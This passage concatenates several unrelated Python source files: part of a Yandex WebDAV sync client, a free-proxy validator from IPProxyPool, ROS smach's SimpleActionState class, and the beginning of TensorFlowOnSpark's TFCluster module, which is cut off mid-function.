if type(path) == unicode:
return path
try:
return _decode_utf8(path)
except UnicodeDecodeError:
pass
return path
def remote(href):
"""
Normalize remote href
:param href: remote path
:return: normalize href
>>> remote("/test/hello.txt")
u'/test/hello.txt'
>>> remote("test/hello.txt")
u'/test/hello.txt'
>>> remote("test\hello.txt")
u'/test/hello.txt'
>>> remote(None)
u'/'
"""
href = _(href)
href = os.path.join(u("/"), href)
if os.sep == "\\":
href = href.replace("\\", "/")
return href
class RemoteObject(object):
def __init__(self, dom, config, root):
self._dom = dom
self._config = config
self.root = root
href = self._getEl("href")
href = _encode_utf8(href)
self.href = _decode_utf8(unquote(href))
self.length = self._getEl("getcontentlength")
self.name = self._getEl("displayname")
self.creationdate = self._getEl("creationdate")
def _getEl(self, name):
els = self._dom.getElementsByTagNameNS("DAV:", name)
return els[0].firstChild.nodeValue if len(els) > 0 else ""
def isFolder(self):
els = self._dom.getElementsByTagNameNS("DAV:", "collection")
return len(els) > 0
def download(self):
return self._config.download(self.href)
def downloadTo(self, path):
return self._config.downloadTo(self.href, path)
def delete(self):
return self._config.delete(self.href)
def list(self):
if self.isFolder() and self.href != self.root:
return self._config.list(os.path.join(self.root, self.href))
return []
def __str__(self):
return self.href
def __unicode__(self):
return self.href
qWork = queue.Queue()
def __call():
while True:
try:
name, func, args = qWork.get()
func(*args)
qWork.task_done()
except queue.Empty:
pass
except Exception:
e = sys.exc_info()[1]
print("Exception: {0} {1}".format(name, e))
threadsContainer = []
def apply_async(name, func, params_list, limit=5):
for params in params_list:
if type(params) is list or type(params) is tuple:
item = (name, func, params)
else:
item = (name, func, [params, ])
res = qWork.put_nowait(item)
if len(threadsContainer) > 0:
return
for i in range(limit):
t = threading.Thread(target=__call)
t.daemon = True
threadsContainer.append(t)
for th in threadsContainer:
th.start()
class ConnectionException(Exception):
"""docstring for NotAuthException"""
def __init__(self, code, msg=""):
strError = _("Not Authorization status code: {0}\n{1}").format(code, msg)
self.code = code
super(ConnectionException, self).__init__(strError)
def checkResponse(response, msg=""):
if response.status not in [200, 201, 207]:
raise ConnectionException(response.status, msg)
class Config(object):
def __init__(self, opts):
"""
Constructor
:param opts: dictionary of property
:return: self
"""
self.user = _encode_utf8(opts.get("user", ""))
self.password = _encode_utf8(opts.get("password", ""))
self.host = _encode_utf8(opts.get("host", "webdav.yandex.ru"))
self.options = opts
self.limit = opts.get("limit", 4)
def getHeaders(self):
"""
Get common headers
:return:
"""
basicauth = base64.encodestring(b(self.user + ':' + self.password)).strip()
return {
"Depth": "1",
"Authorization": 'Basic ' + _decode_utf8(basicauth),
"Accept": "*/*"
}
def getConnection(self):
"""
Get connection
:return: connection http_client.HTTPSConnection
"""
return http_client.HTTPSConnection(self.host)
def list(self, href):
"""
list of files and directories at remote server
:param href: remote folder
:return: list(folders, files) and list(None,None) if folder doesn't exist
"""
for iTry in range(TRYINGS):
logger.info(u("list(%s): %s") % (iTry, href))
folders = None
files = None
try:
href = os.path.join(u("/"), _(href))
conn = self.getConnection()
conn.request("PROPFIND", _encode_utf8(href), u(""), self.getHeaders())
response = conn.getresponse()
checkResponse(response)
data = response.read()
if data == b('list: folder was not found'):
return folders, files
elif data == b('You are not authorized to see this!'):
return folders, files
else:
try:
dom = xml.dom.minidom.parseString(data)
responces = dom.getElementsByTagNameNS("DAV:", "response")
folders = {}
files = {}
for dom in responces:
response = RemoteObject(dom, self, href)
if response.href != href:
if response.isFolder():
folders[response.href] = response
else:
files[response.href] = response
except xml.parsers.expat.ExpatError:
e = sys.exc_info()[1]
logger.exception(e)
return folders, files
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
return folders, files
def sync(self, localpath, href, exclude=None, block=True):
"""
Sync local and remote folders
:param localpath: local folder
:param href: remote folder
:param exclude: filter folder which need to exlude
:return: respose
"""
logger.info(u("sync: %s %s") % (localpath, href))
try:
localpath = _(localpath)
href = remote(href)
localRoot, localFolders, localFiles = next(os.walk(localpath))
remoteFolders, remoteFiles = self.list(href)
if remoteFiles is None or remoteFolders is None:
remoteFiles = {}
remoteFolders = {}
self.mkdir(href)
def norm(folder):
path = os.path.join(href, _(folder))
if path[len(path) - 1] != os.path.sep:
path += u("/")
return path
foldersToCreate = filter(
lambda folderPath: folderPath not in remoteFolders,
map(norm, localFolders)
)
apply_async("mkdir", lambda path: self.mkdir(path), foldersToCreate, self.limit)
filesToSync = filter(
lambda lFile: os.path.join(href, _(lFile)) not in remoteFiles,
localFiles
)
fileArgs = [(os.path.join(localpath, f), os.path.join(href, f))
for f in filesToSync]
apply_async("upload", lambda s, t: self.upload(s, t), fileArgs, self.limit)
for folder in localFolders:
localFolderPath = os.path.join(localpath, folder)
remoteFolderPath = os.path.join(href, folder)
if exclude:
bSync = exclude(localFolderPath, remoteFolderPath)
else:
bSync = True
if bSync:
apply_async(
"sync",
lambda localpath, href: self.sync(localpath, href, exclude, False),
[(localFolderPath, remoteFolderPath), ]
)
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
if block:
qWork.join()
def mkdir(self, href):
"""
create remote folder
:param href: remote path
:return: response
"""
for iTry in range(TRYINGS):
logger.info(u("mkdir(%s): %s") % (iTry, href))
try:
href = remote(href)
con = self.getConnection()
con.request("MKCOL", _encode_utf8(href), "", self.getHeaders())
response = con.getresponse()
checkResponse(response)
return response.read()
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
def download(self, href):
"""
Download file and return response
:param href: remote path
:return: file responce
"""
for iTry in range(TRYINGS):
try:
logger.info(u("download(%s): %s") % (iTry, href))
href = remote(href)
conn = self.getConnection()
conn.request("GET", _encode_utf8(href), "", self.getHeaders())
response = conn.getresponse()
checkResponse(response, "href={0}".format(href))
data = response.read()
if data == b('resource not found'):
return b("")
else:
return data
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
def downloadTo(self, href, localpath):
"""
Download file to localstorage
:param href: remote path
:param localpath: local path
:return: response
"""
for iTry in range(TRYINGS):
logger.info(u("downloadTo(%s): %s %s") % (iTry, href, localpath))
try:
href = remote(href)
localpath = _(localpath)
conn = self.getConnection()
conn.request("GET", _encode_utf8(href), "", self.getHeaders())
response = conn.getresponse()
checkResponse(response)
f = None
try:
while True:
data = _decode_utf8(response.read(1024))
if not data:
break
if data == u('resource not found'):
return False
if not f:
f = open(localpath, "w")
f.write(data)
finally:
if f:
f.close()
return True
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
def delete(self, href):
"""
Delete file from remote server
:param href: remote path
:return: response
"""
for iTry in range(TRYINGS):
logger.info(u("delete(%s): %s") % (iTry, href))
try:
href = remote(href)
conn = self.getConnection()
conn.request("DELETE", _encode_utf8(href), "", self.getHeaders())
response = conn.getresponse()
checkResponse(response)
return response.read()
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
def write(self, f, href, length=None):
logger.info(u("write: %s") % href)
href = remote(href)
href = os.path.join(u("/"), href)
try:
conn = self.getConnection()
headers = self.getHeaders()
headers.update({
"Content-Type": "application/binary",
"Expect": "100-continue"
})
if length:
headers["Content-Length"] = length
href = _encode_utf8(href)
href = quote(href)
conn.request("PUT", href, f, headers)
response = conn.getresponse()
checkResponse(response)
data = response.read()
return data
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
def upload(self, localpath, href):
"""
Upload file from localpath to remote server
:param localpath: local path
:param href: remote path
:return: response
"""
localpath = _(localpath)
href = remote(href)
if not os.path.exists(localpath):
logger.info(u("ERROR: localfile: %s not found") % localpath)
return
if os.path.islink(localpath):
return self.upload(os.path.abspath(os.path.realpath(localpath)), href)
# 3 tryings to upload file
for iTry in range(TRYINGS):
try:
logger.info(u("upload: %s %s") % (localpath, href))
length = os.path.getsize(localpath)
if PY3:
_open = open(_encode_utf8(localpath), "r", encoding='latin-1')
else:
_open = open(_encode_utf8(localpath), "r")
with _open as f:
return self.write(f, href, length=length)
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
if __name__ == "__main__":
pass
|
Validator.py | from IPProxyPool import config
from gevent import monkey
monkey.patch_all()
import time, requests, json, chardet, os, sys, gevent, psutil
from multiprocessing import Process, Queue
from IPProxyPool.util.exception import Test_URL_Fail
from IPProxyPool.db.DataStore import sqlhelper
def detect_from_db(myip, proxy, proxies_set):
proxy_dict = {'ip': proxy[0], 'port': proxy[1]}
result = detect_proxy(myip, proxy_dict)
if result:
proxy_str = '%s:%s' % (proxy[0], proxy[1])
proxies_set.add(proxy_str)
else:
if proxy[2] < 1:
sqlhelper.delete({'ip': proxy[0], 'port': proxy[1]})
else:
score = proxy[2]-1
sqlhelper.update({'ip': proxy[0], 'port': proxy[1]}, {'score': score})
proxy_str = '%s:%s' % (proxy[0], proxy[1])
proxies_set.add(proxy_str)
def validator(queue1, queue2, myip):
tasklist = []
proc_pool = {} # 所有进程列表
cntl_q = Queue() # 控制信息队列
while True:
if not cntl_q.empty():
# 处理已结束的进程
try:
pid = cntl_q.get()
proc = proc_pool.pop(pid)
proc_ps = psutil.Process(pid)
proc_ps.kill()
proc_ps.wait()
except Exception as e:
pass
# print(e)
# print(" we are unable to kill pid:%s" % (pid))
try:
# proxy_dict = {'source':'crawl','data':proxy}
if len(proc_pool) >= config.MAX_CHECK_PROCESS:
time.sleep(config.CHECK_WATI_TIME)
continue
proxy = queue1.get()
tasklist.append(proxy)
if len(tasklist) >= config.MAX_CHECK_CONCURRENT_PER_PROCESS:
p = Process(target=process_start, args=(tasklist, myip, queue2, cntl_q))
p.start()
proc_pool[p.pid] = p
tasklist = []
except Exception as e:
if len(tasklist) > 0:
p = Process(target=process_start, args=(tasklist, myip, queue2, cntl_q))
p.start()
proc_pool[p.pid] = p
tasklist = []
def process_start(tasks, myip, queue2, cntl):
spawns = []
for task in tasks:
spawns.append(gevent.spawn(detect_proxy, myip, task, queue2))
gevent.joinall(spawns)
cntl.put(os.getpid()) # 子进程退出是加入控制队列
def detect_proxy(selfip, proxy, queue2=None):
'''
:param proxy: ip字典
:return:
'''
ip = proxy['ip']
port = proxy['port']
proxies = {"http": "http://%s:%s" % (ip, port), "https": "http://%s:%s" % (ip, port)}
protocol, types, speed = getattr(sys.modules[__name__],config.CHECK_PROXY['function'])(selfip, proxies)#checkProxy(selfip, proxies)
if protocol >= 0:
proxy['protocol'] = protocol
proxy['types'] = types
proxy['speed'] = speed
else:
proxy = None
if queue2:
queue2.put(proxy)
return proxy
def checkProxy(selfip, proxies):
'''
用来检测代理的类型,突然发现,免费网站写的信息不靠谱,还是要自己检测代理的类型
:param
:return:
'''
protocol = -1
types = -1
speed = -1
http, http_types, http_speed = _checkHttpProxy(selfip, proxies)
https, https_types, https_speed = _checkHttpProxy(selfip, proxies, False)
if http and https:
protocol = 2
types = http_types
speed = http_speed
elif http:
types = http_types
protocol = 0
speed = http_speed
elif https:
types = https_types
protocol = 1
speed = https_speed
else:
types = -1
protocol = -1
speed = -1
return protocol, types, speed
def _checkHttpProxy(selfip, proxies, isHttp=True):
types = -1
speed = -1
if isHttp:
test_url = config.TEST_HTTP_HEADER
else:
test_url = config.TEST_HTTPS_HEADER
try:
start = time.time()
r = requests.get(url=test_url, headers=config.get_header(), timeout=config.TIMEOUT, proxies=proxies)
if r.ok:
# 保留两位小数
speed = round(time.time()-start, 2)
content = json.loads(r.text)
headers = content['headers']
ip = content['origin']
proxy_connection = headers.get('Proxy-Connection', None)
if ',' in ip:
types = 2
elif proxy_connection:
types = 1
else:
types = 0
return True, types, speed
else:
return False, types, speed
except Exception as e:
print(e)
return False, types, speed
def baidu_check(selfip, proxies):
'''
用来检测代理的类型,突然发现,免费网站写的信息不靠谱,还是要自己检测代理的类型
:param
:return:
'''
protocol = -1
types = -1
speed = -1
# try:
# #http://ip.chinaz.com/getip.aspx挺稳定,可以用来检测ip
# r = requests.get(url=config.TEST_URL, headers=config.get_header(), timeout=config.TIMEOUT,
# proxies=proxies)
# r.encoding = chardet.detect(r.content)['encoding']
# if r.ok:
# if r.text.find(selfip)>0:
# return protocol, types, speed
# else:
# return protocol,types,speed
#
#
# except Exception as e:
# return protocol, types, speed
try:
start = time.time()
r = requests.get(url='https://www.baidu.com', headers=config.get_header(), timeout=config.TIMEOUT, proxies=proxies)
r.encoding = chardet.detect(r.content)['encoding']
if r.ok:
speed = round(time.time() - start, 2)
protocol= 0
types=0
else:
speed = -1
protocol= -1
types=-1
except Exception as e:
speed = -1
protocol = -1
types = -1
return protocol, types, speed
def getMyIP():
try:
r = requests.get(url=config.TEST_IP, headers=config.get_header(), timeout=config.TIMEOUT)
ip = json.loads(r.text)
return ip['origin']
except Exception as e:
raise Test_URL_Fail
if __name__ == '__main__':
ip = '112.87.70.79'
port = 9999
# proxies = {"http": "http://%s:%s" % (ip, port), "https": "http://%s:%s" % (ip, port)}
proxies = {"https": "http://%s:%s" % (ip, port)}
_checkHttpProxy(None, proxies) |
simple_action_state.py |
import roslib; roslib.load_manifest('smach_ros')
import rospy
import threading
import traceback
import copy
from actionlib.simple_action_client import SimpleActionClient, GoalStatus
import smach
from smach.state import *
__all__ = ['SimpleActionState']
class SimpleActionState(State):
"""Simple action client state.
Use this class to represent an actionlib as a state in a state machine.
"""
# Meta-states for this action
WAITING_FOR_SERVER = 0
INACTIVE = 1
ACTIVE = 2
PREEMPTING = 3
COMPLETED = 4
def __init__(self,
# Action info
action_name,
action_spec,
# Default goal
goal = None,
goal_key = None,
goal_slots = [],
goal_cb = None,
goal_cb_args = [],
goal_cb_kwargs = {},
# Result modes
result_key = None,
result_slots = [],
result_cb = None,
result_cb_args = [],
result_cb_kwargs = {},
# Keys
input_keys = [],
output_keys = [],
outcomes = [],
# Timeouts
exec_timeout = None,
preempt_timeout = rospy.Duration(60.0),
server_wait_timeout = rospy.Duration(60.0),
# Feedback
feedback_cb = None,
feedback_cb_args = [],
feedback_cb_kwargs = {}
):
"""Constructor for SimpleActionState action client wrapper.
@type action_name: string
@param action_name: The name of the action as it will be broadcast over ros.
@type action_spec: actionlib action msg
@param action_spec: The type of action to which this client will connect.
@type goal: actionlib goal msg
@param goal: If the goal for this action does not need to be generated at
runtime, it can be passed to this state on construction.
@type goal_key: string
@param goal_key: Pull the goal message from a key in the userdata.
This will be done before calling the goal_cb if goal_cb is defined.
@type goal_slots: list of string
@param goal_slots: Pull the goal fields (__slots__) from like-named
keys in userdata. This will be done before calling the goal_cb if
goal_cb is defined.
@type goal_cb: callable
@param goal_cb: If the goal for this action needs to be generated at
runtime, a callback can be stored which modifies the default goal
object. The callback is passed two parameters:
- userdata
- current stored goal
The callback returns a goal message.
@type feedback_cb: callable
@param feedback_cb: This callback will be called with the feedback
from the action server. The callback is passed two parameters:
- userdata (L{UserData<smach.user_data.UserData>})
- feedback (actionlib feedback msg)
@type result_key: string
@param result_key: Put the result message into the userdata with
the given key. This will be done after calling the result_cb
if result_cb is defined.
@type result_slots: list of strings
@param result_slots: Put the result message fields (__slots__)
into the userdata with keys like the field names. This will be done
after calling the result_cb if result_cb is defined.
@type result_cb: callable
@param result_cb: If result information from this action needs to be
stored or manipulated on reception of a result from this action, a
callback can be stored which is passed this information. The callback
is passed three parameters:
- userdata (L{UserData<smach.user_data.UserData>})
- result status (C{actionlib.GoalStatus})
- result (actionlib result msg)
@type exec_timeout: C{rospy.Duration}
@param exec_timeout: This is the timeout used for sending a preempt message
to the delegate action. This is C{None} by default, which implies no
timeout.
@type preempt_timeout: C{rospy.Duration}
@param preempt_timeout: This is the timeout used for aborting after a
preempt has been sent to the action and no result has been received. This
timeout begins counting after a preempt message has been sent.
@type server_wait_timeout: C{rospy.Duration}
@param server_wait_timeout: This is the timeout used for aborting while
waiting for an action server to become active.
"""
# Initialize base class
State.__init__(self, outcomes=['succeeded','aborted','preempted'])
# Set action properties
self._action_name = action_name
self._action_spec = action_spec
# Set timeouts
self._goal_status = 0
self._goal_result = None
self._exec_timeout = exec_timeout
self._preempt_timeout = preempt_timeout
self._server_wait_timeout = server_wait_timeout
# Set goal generation policy
if goal and hasattr(goal, '__call__'):
raise smach.InvalidStateError("Goal object given to SimpleActionState that IS a function object")
sl = action_spec().action_goal.goal.__slots__
if not all([s in sl for s in goal_slots]):
raise smach.InvalidStateError("Goal slots specified are not valid slots. Available slots: %s; specified slots: %s" % (sl, goal_slots))
if goal_cb and not hasattr(goal_cb, '__call__'):
raise smach.InvalidStateError("Goal callback object given to SimpleActionState that IS NOT a function object")
# Static goal
if goal is None:
self._goal = copy.copy(action_spec().action_goal.goal)
else:
self._goal = goal
# Goal from userdata key
self._goal_key = goal_key
if goal_key is not None:
self.register_input_keys([goal_key])
# Goal slots from userdata keys
self._goal_slots = goal_slots
self.register_input_keys(goal_slots)
# Goal generation callback
self._goal_cb = goal_cb
self._goal_cb_args = goal_cb_args
self._goal_cb_kwargs = goal_cb_kwargs
if smach.has_smach_interface(goal_cb):
self._goal_cb_input_keys = goal_cb.get_registered_input_keys()
self._goal_cb_output_keys = goal_cb.get_registered_output_keys()
self.register_input_keys(self._goal_cb_input_keys)
self.register_output_keys(self._goal_cb_output_keys)
else:
self._goal_cb_input_keys = input_keys
self._goal_cb_output_keys = output_keys
# Feedback callback
if feedback_cb and not hasattr(feedback_cb, '__call__'):
raise smach.InvalidStateError("Feedback callback object given to SimpleActionState that IS NOT a function object")
self._feedback_cb = feedback_cb
self._feedback_cb_args = feedback_cb_args
self._feedback_cb_kwargs = feedback_cb_kwargs
if smach.has_smach_interface(feedback_cb):
self._feedback_cb_input_keys = feedback_cb.get_registered_input_keys()
self._feedback_cb_output_keys = feedback_cb.get_registered_output_keys()
self.register_input_keys(self._feedback_cb_input_keys)
self.register_output_keys(self._feedback_cb_output_keys)
else:
self._feedback_cb_input_keys = input_keys
self._feedback_cb_output_keys = output_keys
# Set result processing policy
if result_cb and not hasattr(result_cb, '__call__'):
raise smach.InvalidStateError("Result callback object given to SimpleActionState that IS NOT a function object")
if not all([s in action_spec().action_result.result.__slots__ for s in result_slots]):
raise smach.InvalidStateError("Result slots specified are not valid slots.")
# Result callback
self._result_cb = result_cb
self._result_cb_args = result_cb_args
self._result_cb_kwargs = result_cb_kwargs
if smach.has_smach_interface(result_cb):
self._result_cb_input_keys = result_cb.get_registered_input_keys()
self._result_cb_output_keys = result_cb.get_registered_output_keys()
self._result_cb_outcomes = result_cb.get_registered_outcomes()
self.register_input_keys(self._result_cb_input_keys)
self.register_output_keys(self._result_cb_output_keys)
self.register_outcomes(self._result_cb_outcomes)
else:
self._result_cb_input_keys = input_keys
self._result_cb_output_keys = output_keys
self._result_cb_outcomes = outcomes
# Result to userdata key
self._result_key = result_key
if result_key is not None:
self.register_output_keys([result_key])
# Result slots to userdata keys
self._result_slots = result_slots
self.register_output_keys(result_slots)
# Register additional input and output keys
self.register_input_keys(input_keys)
self.register_output_keys(output_keys)
self.register_outcomes(outcomes)
# Declare some status variables
self._activate_time = rospy.Time.now()
self._preempt_time = rospy.Time.now()
self._duration = rospy.Duration(0.0)
self._status = SimpleActionState.WAITING_FOR_SERVER
# Construct action client, and wait for it to come active
self._action_client = SimpleActionClient(action_name, action_spec)
self._action_wait_thread = threading.Thread(name=self._action_name+'/wait_for_server', target=self._wait_for_server)
self._action_wait_thread.start()
self._execution_timer_thread = None
# Condition variables for threading synchronization
self._done_cond = threading.Condition()
def _wait_for_server(self):
"""Internal method for waiting for the action server
This is run in a separate thread and allows construction of this state
to not block the construction of other states.
"""
timeout_time = rospy.get_rostime() + self._server_wait_timeout
while self._status == SimpleActionState.WAITING_FOR_SERVER and not rospy.is_shutdown() and not rospy.get_rostime() >= timeout_time:
try:
if self._action_client.wait_for_server(rospy.Duration(1.0)):#self._server_wait_timeout):
self._status = SimpleActionState.INACTIVE
if self.preempt_requested():
return
except:
if not rospy.core._in_shutdown: # This is a hack, wait_for_server should not throw an exception just because shutdown was called
rospy.logerr("Failed to wait for action server '%s'" % (self._action_name))
def _execution_timer(self):
"""Internal method for cancelling a timed out goal after a timeout."""
while self._status == SimpleActionState.ACTIVE and not rospy.is_shutdown():
try:
rospy.sleep(0.1)
except:
if not rospy.is_shutdown():
rospy.logerr("Failed to sleep while running '%s'" % self._action_name)
if rospy.Time.now() - self._activate_time > self._exec_timeout:
rospy.logwarn("Action %s timed out after %d seconds." % (self._action_name, self._exec_timeout.to_sec()))
# Cancel the goal
self._action_client.cancel_goal()
### smach State API
def request_preempt(self):
rospy.loginfo("Preempt requested on action '%s'" % (self._action_name))
smach.State.request_preempt(self)
if self._status == SimpleActionState.ACTIVE:
rospy.loginfo("Preempt on action '%s' cancelling goal: \n%s" % (self._action_name, str(self._goal)))
# Cancel the goal
self._action_client.cancel_goal()
def execute(self, ud):
"""Called when executing a state.
This calls the goal_cb if it is defined, and then dispatches the
goal with a non-blocking call to the action client.
"""
# Make sure we're connected to the action server
if self._status is SimpleActionState.WAITING_FOR_SERVER:
rospy.logwarn("Still waiting for action server '%s' to start... is it running?" % self._action_name)
if self._action_wait_thread.is_alive():
# Block on joining the server wait thread (This can be preempted)
self._action_wait_thread.join()
else:
# Wait for the server in this thread (This can also be preempted)
self._wait_for_server()
if not self.preempt_requested():
# In case of preemption we probably didn't connect
rospy.loginfo("Connected to action server '%s'." % self._action_name)
# Check for preemption before executing
if self.preempt_requested():
rospy.loginfo("Preempting %s before sending goal." % self._action_name)
self.service_preempt()
return 'preempted'
# We should only get here if we have connected to the server
if self._status is SimpleActionState.WAITING_FOR_SERVER:
rospy.logfatal("Action server for "+self._action_name+" is not running.")
return 'aborted'
else:
self._status = SimpleActionState.INACTIVE
# Grab goal key, if set
if self._goal_key is not None:
self._goal = ud[self._goal_key]
# Write goal fields from userdata if set
for key in self._goal_slots:
setattr(self._goal, key, ud[key])
# Call user-supplied callback, if set, to get a goal
if self._goal_cb is not None:
try:
goal_update = self._goal_cb(
smach.Remapper(
ud,
self._goal_cb_input_keys,
self._goal_cb_output_keys,
[]),
self._goal,
*self._goal_cb_args,
**self._goal_cb_kwargs)
if goal_update is not None:
self._goal = goal_update
except:
rospy.logerr("Could not execute goal callback: "+traceback.format_exc())
return 'aborted'
# Make sure the necessary paramters have been set
if self._goal is None and self._goal_cb is None:
rospy.logerr("Attempting to activate action "+self._action_name+" with no goal or goal callback set. Did you construct the SimpleActionState properly?")
return 'aborted'
# Dispatch goal via non-blocking call to action client
self._activate_time = rospy.Time.now()
self._status = SimpleActionState.ACTIVE
# Wait on done condition
self._done_cond.acquire()
self._ud = ud
self._action_client.send_goal(self._goal, self._goal_done_cb, self._goal_active_cb, self._goal_feedback_cb)
# Preempt timeout watch thread
if self._exec_timeout:
self._execution_timer_thread = threading.Thread(name=self._action_name+'/preempt_watchdog', target=self._execution_timer)
self._execution_timer_thread.start()
# Wait for action to finish
self._done_cond.wait()
# Call user result callback if defined
result_cb_outcome = None
if self._result_cb is not None:
try:
result_cb_outcome = self._result_cb(
smach.Remapper(
ud,
self._result_cb_input_keys,
self._result_cb_output_keys,
[]),
self._goal_status,
self._goal_result)
if result_cb_outcome is not None and result_cb_outcome not in self.get_registered_outcomes():
rospy.logerr("Result callback for action "+self._action_name+", "+str(self._result_cb)+" was not registered with the result_cb_outcomes argument. The result callback returned '"+str(result_cb_outcome)+"' but the only registered outcomes are: "+str(self.get_registered_outcomes()))
return 'aborted'
except:
rospy.logerr("Could not execute result callback: "+traceback.format_exc())
return 'aborted'
if self._result_key is not None:
ud[self._result_key] = self._goal_result
for key in self._result_slots:
ud[key] = getattr(self._goal_result, key)
# Check status
if self._status == SimpleActionState.INACTIVE:
# Set the outcome on the result state
if self._goal_status == GoalStatus.SUCCEEDED:
outcome = 'succeeded'
elif self._goal_status == GoalStatus.PREEMPTED and self.preempt_requested():
outcome = 'preempted'
self.service_preempt()
else:
# All failures at this level are captured by aborting, even if we timed out
# This is an important distinction between local preemption, and preemption
# from above.
outcome = 'aborted'
else:
# We terminated without going inactive
rospy.logwarn("Action state terminated without going inactive first.")
outcome = 'aborted'
# Check custom result cb outcome
if result_cb_outcome is not None:
outcome = result_cb_outcome
# Set status inactive
self._status = SimpleActionState.INACTIVE
self._done_cond.release()
return outcome
### Action client callbacks
def _goal_active_cb(self):
"""Goal Active Callback
This callback starts the timer that watches for the timeout specified for this action.
"""
rospy.logdebug("Action "+self._action_name+" has gone active.")
def _goal_feedback_cb(self, feedback):
"""Goal Feedback Callback"""
rospy.logdebug("Action "+self._action_name+" sent feedback.")
if self._feedback_cb is not None:
self._feedback_cb(
smach.Remapper(
self._ud,
self._feedback_cb_input_keys,
self._feedback_cb_output_keys,
[]),
feedback,
*self._feedback_cb_args,
**self._feedback_cb_kwargs)
def _goal_done_cb(self, result_state, result):
"""Goal Done Callback
This callback resets the active flags and reports the duration of the action.
Also, if the user has defined a result_cb, it is called here before the
method returns.
"""
def get_result_str(i):
strs = ('PENDING','ACTIVE','PREEMPTED','SUCCEEDED','ABORTED','REJECTED','LOST')
if i < len(strs):
return strs[i]
else:
return 'UNKNOWN ('+str(i)+')'
# Calculate duration
self._duration = rospy.Time.now() - self._activate_time
rospy.logdebug("Action "+self._action_name+" terminated after "\
+str(self._duration.to_sec())+" seconds with result "\
+get_result_str(self._action_client.get_state())+".")
# Store goal state
self._goal_status = result_state
self._goal_result = result
# Rest status
self._status = SimpleActionState.INACTIVE
# Notify done
self._done_cond.acquire()
self._done_cond.notify()
self._done_cond.release()
|
TFCluster.py | # Copyright 2017 Yahoo Inc.
# Licensed under the terms of the Apache 2.0 license.
# Please see LICENSE file in the project root for terms.
"""
This module provides a high-level API to manage the TensorFlowOnSpark cluster.
There are three main phases of operation:
1. **Reservation/Startup** - reserves a port for the TensorFlow process on each executor, starts a multiprocessing.Manager to
listen for data/control messages, and then launches the Tensorflow main function on the executors.
2. **Data feeding** - *For InputMode.SPARK only*. Sends RDD data to the TensorFlow nodes via each executor's multiprocessing.Manager. PS
nodes will tie up their executors, so they won't receive any subsequent data feeding tasks.
3. **Shutdown** - sends a shutdown control message to the multiprocessing.Managers of the PS nodes and pushes end-of-feed markers into the data
queues of the worker nodes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import nested_scopes
from __future__ import print_function
import logging
import os
import random
import sys
import threading
import time
from pyspark.streaming import DStream
from . import reservation
from . import TFManager
from . import TFSparkNode
# status of TF background job
tf_status = {}
class InputMode(object):
"""Enum for the input modes of data feeding."""
TENSORFLOW = 0 #: TensorFlow application is responsible for reading any data.
SPARK = 1 #: Spark is responsible for feeding data to the TensorFlow application via an RDD.
class TFCluster(object):
sc = None #: SparkContext
defaultFS = None #: Default FileSystem string, e.g. ``file://`` or ``hdfs://<namenode>/``
working_dir = None #: Current working directory
num_executors = None #: Number of executors in the Spark job (and therefore, the number of nodes in the TensorFlow cluster).
nodeRDD = None #: RDD representing the nodes of the cluster, i.e. ``sc.parallelize(range(num_executors), num_executors)``
cluster_id = None #: Unique ID for this cluster, used to invalidate state for new clusters.
cluster_info = None #: Cluster node reservations
cluster_meta = None #: Cluster metadata dictionary, e.g. cluster_id, defaultFS, reservation.Server address, etc.
input_mode = None #: TFCluster.InputMode for this cluster
queues = None #: *INTERNAL_USE*
server = None #: reservation.Server for this cluster
def train(self, dataRDD, num_epochs=0, qname='input'):
"""*For InputMode.SPARK only*. Feeds Spark RDD partitions into the TensorFlow worker nodes
It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD.
Since epochs are implemented via ``RDD.union()`` and the entire RDD must generally be processed in full, it is recommended
to set ``num_epochs`` to closely match your training termination condition (e.g. steps or accuracy). See ``TFNode.DataFeed``
for more details.
Args:
:dataRDD: input data as a Spark RDD.
:num_epochs: number of times to repeat the dataset during training.
:qname: *INTERNAL USE*.
"""
logging.info("Feeding training data")
assert(self.input_mode == InputMode.SPARK)
assert(qname in self.queues)
assert(num_epochs >= 0)
if isinstance(dataRDD, DStream):
# Spark Streaming
dataRDD.foreachRDD(lambda rdd: rdd.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, qname)))
else:
# Spark RDD
# if num_epochs unspecified, pick an arbitrarily "large" number for now
# TODO: calculate via dataRDD.count() / batch_size / max_steps
if num_epochs == 0:
num_epochs = 10
rdds = [dataRDD] * num_epochs
unionRDD = self.sc.union(rdds)
unionRDD.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, qname))
def inference(self, dataRDD, qname='input'):
"""*For InputMode.SPARK only*: Feeds Spark RDD partitions into the TensorFlow worker nodes and returns an RDD of results
It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD and provide valid data for the output RDD.
This will use the distributed TensorFlow cluster for inferencing, so the TensorFlow "main" function should be capable of inferencing.
Per Spark design, the output RDD will be lazily-executed only when a Spark action is invoked on the RDD.
Args:
:dataRDD: input data as a Spark RDD
:qname: *INTERNAL_USE*
Returns:
A Spark RDD representing the output of the TensorFlow inferencing
"""
logging.info("Feeding inference data")
assert(self.input_mode == InputMode.SPARK)
assert(qname in self.queues)
return dataRDD.mapPartitions(TFSparkNode.inference(self.cluster_info, qname))
def shutdown(self, ssc=None):
"""Stops the distributed TensorFlow cluster.
Args:
:ssc: *For Streaming applications only*. Spark StreamingContext
"""
logging.info("Stopping TensorFlow nodes")
# identify ps/workers
ps_list, worker_list = [], []
for node in self.cluster_info:
(ps_list if node['job_name'] == 'ps' else worker_list).append(node)
if ssc is not None:
# Spark Streaming
while not ssc.awaitTerminationOrTimeout(1):
if self.server.done:
logging.info("Server done, stopping StreamingContext")
ssc.stop(stopSparkContext=False, stopGraceFully=True)
break
elif self.input_mode == InputMode.TENSORFLOW:
# in TENSORFLOW mode, there is no "data feeding" job, only a "start" job, so we must wait for the TensorFlow workers
